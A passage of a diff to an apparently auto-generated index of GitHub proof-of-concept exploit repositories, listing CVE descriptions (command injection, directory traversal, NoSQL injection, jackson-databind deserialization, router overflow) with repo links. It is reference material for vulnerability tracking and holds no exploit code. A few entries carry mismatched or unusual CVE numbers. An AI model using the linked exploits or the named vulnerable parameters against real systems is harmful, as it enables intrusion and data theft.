FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl).
@@ -9404,6 +27568,28 @@
- [Al1ex/CVE-2020-35728](https://github.com/Al1ex/CVE-2020-35728)
+### CVE-2020-35729 (2020-12-27)
+
+KLog Server 2.4.1 allows OS command injection via shell metacharacters in the actions/authenticate.php user parameter.
+
+
+- [Al1ex/CVE-2020-35729](https://github.com/Al1ex/CVE-2020-35729)
+
+### CVE-2020-35749 (2021-01-15)
+
+Directory traversal vulnerability in class-simple_job_board_resume_download_handler.php in the Simple Board Job plugin 2.9.3 and earlier for WordPress allows remote attackers to read arbitrary files via the sjb_file parameter to wp-admin/post.php.
+
+
+- [M4xSec/Wordpress-CVE-2020-35749](https://github.com/M4xSec/Wordpress-CVE-2020-35749)
+
+### CVE-2020-35846 (2020-12-30)
+
+Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function.
+
+
+- [JohnHammond/CVE-2020-35846](https://github.com/JohnHammond/CVE-2020-35846)
+- [0z09e/CVE-2020-35846](https://github.com/0z09e/CVE-2020-35846)
+
### CVE-2020-35847 (2020-12-30)
Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function.
@@ -9411,12 +27597,55 @@
- [w33vils/CVE-2020-35847_CVE-2020-35848](https://github.com/w33vils/CVE-2020-35847_CVE-2020-35848)
+### CVE-2020-36079 (2021-02-26)
+
+Zenphoto through 1.5.7 is affected by authenticated arbitrary file upload, leading to remote code execution. The attacker must navigate to the uploader plugin, check the elFinder box, and then drag and drop files into the Files(elFinder) portion of the UI. This can, for example, place a .php file in the server's uploaded/ directory. NOTE: the vendor disputes this because exploitation can only be performed by an admin who has "lots of other possibilities to harm a site.
+
+
+- [azizalshammari/CVE-2020-36079.](https://github.com/azizalshammari/CVE-2020-36079.)
+
### CVE-2020-36109 (2021-02-01)
ASUS RT-AX86U router firmware below version under 9.0.0.4_386 has a buffer overflow in the blocking_request.cgi function of the httpd module that can cause code execution when an attacker constructs malicious data.
- [tin-z/CVE-2020-36109-POC](https://github.com/tin-z/CVE-2020-36109-POC)
+- [sunn1day/CVE-2020-36109-POC](https://github.com/sunn1day/CVE-2020-36109-POC)
+
+### CVE-2020-36179 (2021-01-06)
+
+FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS.
+
+
+- [Al1ex/CVE-2020-36179](https://github.com/Al1ex/CVE-2020-36179)
+
+### CVE-2020-36184 (2021-01-06)
+
+FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource.
+
+
+- [Al1ex/CVE-2020-36184](https://github.com/Al1ex/CVE-2020-36184)
+
+### CVE-2020-36188 (2021-01-06)
+
+FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource.
+
+
+- [Al1ex/CVE-2020-36188](https://github.com/Al1ex/CVE-2020-36188)
+
+### CVE-2020-36287 (2021-04-09)
+
+The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check.
+
+
+- [f4rber/CVE-2020-36287](https://github.com/f4rber/CVE-2020-36287)
+
+### CVE-2020-36518 (2022-03-11)
+
+jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects.
+
+
+- [ghillert/boot-jackson-cve](https://github.com/ghillert/boot-jackson-cve)
### CVE-2020-36603 (2020-10-15)
@@ -9443,6 +27672,9 @@
### CVE-2020-72381
- [jdordonezn/CVE-2020-72381](https://github.com/jdordonezn/CVE-2020-72381)
+### CVE-2020-256480
+- [dim0x69/cve-2022-25640-exploit](https://github.com/dim0x69/cve-2022-25640-exploit)
+
## 2019
### CVE-2019-0053 (2019-07-11)
@@ -9982,7 +28214,7 @@
An elevation of privilege vulnerability exists when the Windows Printer Service improperly validates file paths while loading printer drivers, aka 'Windows Printer Service Elevation of Privilege Vulnerability'.
-- [2yong1/CVE-2019-1477](https://github.com/2yong1/CVE-2019-1477)
+- [dydx-0/CVE-2019-1477](https://github.com/dydx-0/CVE-2019-1477)
### CVE-2019-1579 (2019-07-19)
@@ -23698,7 +41930,6 @@
- [thunderstrike9090/Conflicker_analysis_scripts](https://github.com/thunderstrike9090/Conflicker_analysis_scripts)
-- [pxcs/CVE-29343-Sysmon-list](https://github.com/pxcs/CVE-29343-Sysmon-list)
### CVE-2008-4609 (2008-10-20)